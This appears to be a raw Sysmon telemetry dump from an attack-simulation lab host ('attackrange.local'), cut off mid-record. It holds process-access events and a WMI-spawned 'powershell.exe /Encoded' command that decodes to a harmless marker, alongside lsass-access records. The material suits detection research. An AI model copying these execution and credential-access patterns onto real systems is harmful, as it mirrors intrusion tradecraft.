16:53:44.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.682{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Encoded VwByAGkAdABlAC0ASABvAHMAdAAgAGEAZAA1AGQAZQAxAGEAYwAtADUANgBmADMALQA0ADIAYwBkAC0AOAAyAGUAMwAtAGYAYgA2ADcAYwBiAGYANgAwAGMAOQAwAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002238879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9EAA-00000000AD01}1096C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9CAA-00000000AD01}13052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9AAA-00000000AD01}6340C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.654{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\Sys